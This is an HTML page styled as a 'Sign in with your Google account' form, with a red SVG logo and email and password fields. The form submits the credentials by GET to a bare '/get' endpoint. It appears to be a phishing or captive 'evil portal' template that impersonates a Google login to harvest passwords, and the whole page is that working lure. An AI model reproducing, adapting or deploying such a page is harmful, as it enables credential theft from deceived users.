<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #EF112E;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #EF112E;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #EF112E;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 1px solid #EF112E;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #EF112E;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
  margin-top: 18px;
}

.submit-btn:hover {
  background: #EF112E;
}



</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="256.000000pt" height="78.000000pt" viewBox="0 0 2560.000000 788.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,788.000000) scale(0.100000,-0.100000)"
fill="#EF112E" stroke="none">
<path d="M22985 7869 c-1627 -101 -3041 -579 -4128 -1396 -803 -603 -1380
-1383 -1622 -2193 -103 -345 -142 -638 -132 -1004 13 -498 133 -951 363 -1370
613 -1120 1867 -1782 3588 -1895 500 -34 1642 3 2316 75 298 31 837 117 856
136 10 11 387 1399 381 1405 -4 3 -91 -20 -194 -50 -586 -175 -1085 -276
-1568 -317 -578 -49 -1184 78 -1645 342 -203 117 -353 234 -521 405 -359 365
-580 817 -666 1363 -27 175 -25 587 5 768 188 1147 1006 2051 2147 2372 443
124 932 155 1475 95 472 -53 942 -176 1404 -367 156 -64 153 -63 159 -41 51
174 397 1455 397 1469 0 17 -17 23 -127 47 -314 67 -597 107 -1023 143 -215
19 -1233 28 -1465 13z m-1120 -490 c-905 -258 -1766 -657 -2410 -1118 -959
-686 -1510 -1505 -1649 -2453 -39 -261 -39 -614 -1 -869 68 -452 244 -858 523
-1209 103 -130 304 -327 442 -434 224 -173 413 -290 683 -421 650 -316 1453
-515 2381 -590 174 -14 243 -24 170 -25 -16 -1 -130 -5 -254 -9 -1095 -42
-2177 212 -2948 692 -535 333 -930 783 -1144 1307 -261 636 -277 1424 -43
2126 386 1156 1501 2155 3033 2715 347 127 742 230 1107 289 154 25 201 24
110 -1z"/>
<path d="M18250 7725 c-89 -37 -225 -55 -460 -60 -118 -3 -1389 -10 -2825 -16
-1435 -6 -2790 -14 -3009 -18 l-399 -6 87 -53 c103 -63 210 -161 262 -240 109
-163 134 -407 74 -701 -16 -77 -1180 -4499 -1331 -5056 -218 -802 -420 -1204
-668 -1328 -158 -79 -367 -70 -526 22 -114 66 -260 229 -422 471 -38 58 -528
928 -1087 1935 -560 1007 -1024 1839 -1031 1850 -12 19 114 111 2137 1555
1182 843 2152 1538 2155 1543 3 5 -143 6 -353 3 -198 -3 -1060 -9 -1916 -12
-857 -4 -1558 -9 -1558 -13 0 -3 33 -26 73 -51 98 -60 253 -217 296 -297 84
-162 71 -328 -38 -496 -69 -106 -148 -180 -417 -388 -131 -103 -810 -635
-1509 -1182 -698 -548 -1270 -995 -1272 -994 -6 7 650 2414 676 2481 86 216
191 376 351 536 141 142 261 228 448 321 78 40 141 73 140 73 -6 3 -2877 -15
-3488 -22 l-645 -7 45 -24 c87 -46 192 -125 250 -188 171 -187 216 -447 140
-810 -22 -105 -1337 -5062 -1400 -5276 -42 -146 -113 -333 -162 -430 -159
-317 -404 -553 -746 -719 -68 -33 -122 -62 -120 -64 6 -6 3445 16 3782 24
l299 7 -54 36 c-201 134 -325 306 -365 509 -23 114 -14 310 20 475 23 111 595
2227 614 2268 6 14 212 -397 822 -1638 l815 -1657 455 6 c641 9 2420 24 4140
36 806 5 1833 13 2283 16 l817 7 -93 96 c-198 205 -279 387 -293 661 -7 131
11 298 51 470 34 147 530 1989 538 1996 3 3 369 7 814 8 744 1 817 0 918 -17
263 -45 438 -132 622 -310 40 -39 75 -68 79 -65 8 8 467 1769 462 1773 -2 3
-28 -4 -56 -15 -134 -51 -139 -51 -1350 -62 -623 -6 -1135 -8 -1137 -6 -3 2
96 380 218 839 l222 834 420 8 c231 4 760 6 1175 4 659 -3 768 -6 858 -21 314
-52 492 -149 694 -375 l57 -63 15 53 c22 77 476 1780 476 1785 0 7 -12 3 -70
-21z m-5910 -310 c76 -39 170 -135 208 -215 73 -155 81 -387 21 -655 -36 -163
-1448 -5454 -1485 -5565 -119 -361 -255 -523 -489 -587 -51 -14 -245 -30 -245
-21 0 3 30 23 66 44 39 23 96 70 138 115 115 122 189 282 286 618 39 138 1388
5183 1440 5386 46 179 63 300 63 440 1 180 -32 289 -138 462 l-26 42 53 -18
c30 -10 78 -31 108 -46z m-4164 5 c114 -55 193 -130 241 -227 34 -69 38 -85
41 -173 10 -233 -108 -468 -358 -720 -98 -99 -349 -298 -1674 -1326 -858 -665
-1567 -1214 -1575 -1220 -13 -10 84 -212 689 -1435 388 -782 710 -1427 715
-1433 6 -6 33 -42 60 -81 27 -38 85 -107 129 -153 123 -127 242 -200 371 -226
54 -11 23 -13 -295 -19 -195 -3 -355 -5 -356 -4 -15 19 -1675 3409 -1672 3416
1 5 730 572 1618 1260 915 708 1659 1292 1717 1347 159 149 264 298 320 457
20 56 26 98 30 187 6 137 -10 217 -62 321 -19 38 -32 69 -28 69 4 0 44 -18 89
-40z m-5423 -20 c71 -27 167 -97 208 -152 116 -157 140 -416 68 -733 -37 -164
-1437 -5411 -1469 -5505 -129 -383 -304 -584 -560 -645 -67 -16 -259 -33 -249
-22 3 4 32 24 65 45 222 144 405 428 490 762 14 58 343 1293 731 2745 388
1452 716 2692 730 2755 33 157 42 378 19 482 -19 85 -62 181 -113 252 l-35 49
29 -6 c16 -3 54 -15 86 -27z m14267 -450 c131 -12 296 -43 376 -70 157 -54
283 -154 335 -264 30 -64 52 -160 47 -201 -3 -23 -6 -22 -73 30 -128 100 -280
166 -463 199 -182 34 -336 37 -1441 30 -927 -6 -1083 -5 -1079 7 3 8 23 71 44
141 l39 128 255 2 c721 9 1856 7 1960 -2z m-1475 -2984 c359 -59 552 -179 615
-383 19 -63 27 -153 13 -153 -4 0 -18 11 -32 24 -84 78 -246 160 -387 196
-211 54 -229 55 -1061 52 -425 -2 -773 0 -773 4 0 4 17 70 37 146 l38 140 725
-5 c614 -3 740 -6 825 -21z"/>
</g>
</svg>




  </div>

  <div class="form-container">

    <center><h1>Sign in with your <b>Google</b> account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>
	  
      <button class="submit-btn" type="submit">Continue</button>
    

    </form>

  </div>

</div>
</body>
</html>
